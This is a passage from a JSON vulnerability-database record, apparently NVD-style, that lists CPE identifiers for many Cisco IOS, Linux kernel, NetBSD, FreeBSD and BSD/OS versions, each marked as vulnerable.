                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4mr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.62:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)db1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xs1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bc2f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sx1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxd6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ja1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2bz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ys:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9a\\)bc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.51:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(12\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0.12\\(a\\)bt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3na:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(20\\)aa4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(15\\)aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(18\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(4\\)xaf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(11\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)s5a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3da:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(15a\\)p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(15\\)g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(12\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(13\\)ia:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8\\)sa3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\)xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)st6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15\\)sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(12\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s4a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ea1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\)e4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)ea1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)st7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(9\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5.3\\)wc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ec1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)ew3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)ea4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)st2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20.4\\)sp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7.4\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(8.3\\)sc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)e3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3a\\)xi8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8a\\)ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bc2i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1db:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1az:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)cz3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)s15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zo:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)ys:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12c\\)ew4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(27\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)ea5a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4.3\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\)ea:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1eo:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zh3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14.5\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17\\)zd3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)dd3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(9\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sxa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)s13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)yu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xb4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(23f\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)seb3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sea:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)yy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sv3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xj1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(24\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2su:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2\\)xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)st8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)db2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(9\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19.3\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(10d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(3i\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ym:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)ja5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xk1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xk3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5a\\)b2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)xi7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(3\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yg1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.51:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.67:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.16:*:*:*:*:*:*:*",
                "cpe_name": [],
